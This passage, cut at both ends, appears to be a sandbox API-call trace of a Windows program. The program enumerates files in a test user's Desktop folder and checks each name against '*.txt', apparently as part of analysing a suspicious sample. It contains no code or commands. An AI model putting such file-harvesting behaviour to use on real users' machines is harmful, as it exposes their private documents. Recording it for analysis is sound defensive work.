ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="p B1LdDcHaeS", cAlternateFileName="PB1LDD~1")) returned 1 [0110.646] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.646] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.646] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.646] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.646] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.646] lstrcatW (in: lpString1="\\", lpString2="p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.646] lstrcmpW (lpString1="p B1LdDcHaeS", lpString2=".") returned 1 [0110.646] lstrcmpW (lpString1="p B1LdDcHaeS", lpString2="..") returned 1 [0110.646] lstrcpyW (in: lpString1=0x19c8c0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.646] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*" [0110.646] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0110.646] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.646] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.646] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\." [0110.647] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.647] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.647] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="." | out: lpString1="\\p B1LdDcHaeS\\.") returned="\\p B1LdDcHaeS\\." [0110.647] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.647] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.647] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.647] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.647] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\.." [0110.647] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.647] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.647] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2=".." | out: lpString1="\\p B1LdDcHaeS\\..") returned="\\p B1LdDcHaeS\\.." [0110.647] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.647] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.647] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5cc6e0, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x5ed18130, ftLastAccessTime.dwHighDateTime=0x1d7a4a0, ftLastWriteTime.dwLowDateTime=0x5ed18130, ftLastWriteTime.dwHighDateTime=0x1d7a4a0, nFileSizeHigh=0x0, nFileSizeLow=0x34c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6eLLiqLz9t.avi", cAlternateFileName="6ELLIQ~1.AVI")) returned 1 [0110.647] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.647] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.647] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="6eLLiqLz9t.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi" [0110.647] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.647] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.647] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="6eLLiqLz9t.avi" | out: lpString1="\\p B1LdDcHaeS\\6eLLiqLz9t.avi") returned="\\p B1LdDcHaeS\\6eLLiqLz9t.avi" [0110.647] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.648] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2bb8 [0110.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x29a2bb8, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", lpUsedDefaultChar=0x0) returned 59 [0110.648] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0110.648] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0110.648] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.648] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac78 [0110.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aac78, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.648] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac78 | out: hHeap=0x29a0000) returned 1 [0110.648] PathMatchSpecW (pszFile="6eLLiqLz9t.avi", pszSpec="*.txt") returned 0 [0110.648] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.648] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe18e7860, ftCreationTime.dwHighDateTime=0x1d7a074, ftLastAccessTime.dwLowDateTime=0x48a8aa90, ftLastAccessTime.dwHighDateTime=0x1d7ab22, ftLastWriteTime.dwLowDateTime=0x48a8aa90, ftLastWriteTime.dwHighDateTime=0x1d7ab22, nFileSizeHigh=0x0, nFileSizeLow=0xdfb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="D9uCaq_HSLxl.pdf", cAlternateFileName="D9UCAQ~1.PDF")) returned 1 [0110.648] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.648] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.648] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="D9uCaq_HSLxl.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf" [0110.648] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.648] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.648] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="D9uCaq_HSLxl.pdf" | out: lpString1="\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf") returned="\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf" [0110.648] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0110.648] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3d) returned 0x29a2ae0 [0110.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x29a2ae0, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", lpUsedDefaultChar=0x0) returned 61 [0110.648] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0110.648] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.648] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.648] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaaf8 [0110.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aaaf8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.649] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.649] PathMatchSpecW (pszFile="D9uCaq_HSLxl.pdf", pszSpec="*.txt") returned 0 [0110.649] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.649] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8974c4f0, ftCreationTime.dwHighDateTime=0x1d7af73, ftLastAccessTime.dwLowDateTime=0x4d8c28d0, ftLastAccessTime.dwHighDateTime=0x1d7b012, ftLastWriteTime.dwLowDateTime=0x4d8c28d0, ftLastWriteTime.dwHighDateTime=0x1d7b012, nFileSizeHigh=0x0, nFileSizeLow=0x7537, dwReserved0=0x0, dwReserved1=0x0, cFileName="E144W5Mz.swf", cAlternateFileName="")) returned 1 [0110.649] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.649] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.649] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="E144W5Mz.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf" [0110.649] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.649] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.649] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="E144W5Mz.swf" | out: lpString1="\\p B1LdDcHaeS\\E144W5Mz.swf") returned="\\p B1LdDcHaeS\\E144W5Mz.swf" [0110.649] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.649] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a29c0 [0110.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x29a29c0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", lpUsedDefaultChar=0x0) returned 57 [0110.649] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2858 [0110.649] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0110.649] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.649] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab58 [0110.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aab58, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.649] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab58 | out: hHeap=0x29a0000) returned 1 [0110.649] PathMatchSpecW (pszFile="E144W5Mz.swf", pszSpec="*.txt") returned 0 [0110.650] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2858 | out: hHeap=0x29a0000) returned 1 [0110.650] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd254fcd0, ftCreationTime.dwHighDateTime=0x1d7a618, ftLastAccessTime.dwLowDateTime=0x8a464820, ftLastAccessTime.dwHighDateTime=0x1d7aac5, ftLastWriteTime.dwLowDateTime=0x8a464820, ftLastWriteTime.dwHighDateTime=0x1d7aac5, nFileSizeHigh=0x0, nFileSizeLow=0xbc6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lDOubGqNdXLFW1EA.wav", cAlternateFileName="LDOUBG~1.WAV")) returned 1 [0110.650] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.650] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.650] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="lDOubGqNdXLFW1EA.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav" [0110.650] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.650] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.650] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="lDOubGqNdXLFW1EA.wav" | out: lpString1="\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav") returned="\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav" [0110.650] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a04e8 [0110.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0110.650] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x41) returned 0x39700d0 [0110.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x39700d0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", lpUsedDefaultChar=0x0) returned 65 [0110.650] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a11c0 [0110.650] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.650] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.650] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaaf8 [0110.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aaaf8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.650] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.650] PathMatchSpecW (pszFile="lDOubGqNdXLFW1EA.wav", pszSpec="*.txt") returned 0 [0110.650] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.650] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4da7350, ftCreationTime.dwHighDateTime=0x1d79ff8, ftLastAccessTime.dwLowDateTime=0x83641e80, ftLastAccessTime.dwHighDateTime=0x1d7ac8a, ftLastWriteTime.dwLowDateTime=0x83641e80, ftLastWriteTime.dwHighDateTime=0x1d7ac8a, nFileSizeHigh=0x0, nFileSizeLow=0x10bdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFSiahfxrlNjf.swf", cAlternateFileName="OFSIAH~1.SWF")) returned 1 [0110.650] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.650] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.651] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="OFSiahfxrlNjf.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf" [0110.651] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.651] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.651] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="OFSiahfxrlNjf.swf" | out: lpString1="\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf") returned="\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf" [0110.651] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.651] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2ae0 [0110.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x29a2ae0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 